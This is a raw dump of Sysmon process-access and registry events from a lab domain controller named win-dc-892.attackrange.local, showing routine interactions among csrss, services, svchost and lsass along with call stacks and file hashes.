12:01:01.080{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-3500-00000000AE01}2820C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 11241100x80000000000000001654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.080{266CAFBE-647C-6064-2C00-00000000AE01}2916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_barrpzxw.gij.ps12021-03-31 12:01:01.080 10341000x80000000000000001653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.080{266CAFBE-646A-6064-0A00-00000000AE01}840932C:\Windows\system32\services.exe{266CAFBE-647D-6064-3500-00000000AE01}2820C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.078{266CAFBE-647D-6064-3500-00000000AE01}2820C:\Windows\System32\ismserv.exe10.0.14393.0 (rs1_release.160715-1616)Windows NT Intersite Messaging ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationismserv.exeC:\Windows\System32\ismserv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=39F0EC2CAE7FF38BABDDE2252ACCEA67,SHA256=29BDF4D2040D24E02B830A272D02CF29F19FD4E1A0F54F22BCC76301A0BFD26F,IMPHASH=088F7CD1DAA87B8E05239EDAB00479BB{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.065{266CAFBE-646A-6064-0A00-00000000AE01}8401092C:\Windows\system32\services.exe{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.063{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe10.0.14393.4046Microsoft.ActiveDirectory.WebServicesMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.ActiveDirectory.WebServices.exeC:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=868245AE57651C1D8889B528A182C81A,SHA256=2BA73582B4334AEDA469B97D528C24CCB2392FD189524198017D59DF4C4F6504,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.065{266CAFBE-646A-6064-0A00-00000000AE01}8403012C:\Windows\system32\services.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.065{266CAFBE-646A-6064-0B00-00000000AE01}856100C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.065{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646A-6064-0B00-00000000AE01}856100C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.065{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:01.065{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 13241300x80000000000000001627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:01.065{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x80000000000000001626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646A-6064-0A00-00000000AE01}8401100C:\Windows\system32\services.exe{266CAFBE-647D-6064-2E00-00000000AE01}3028C:\Program 
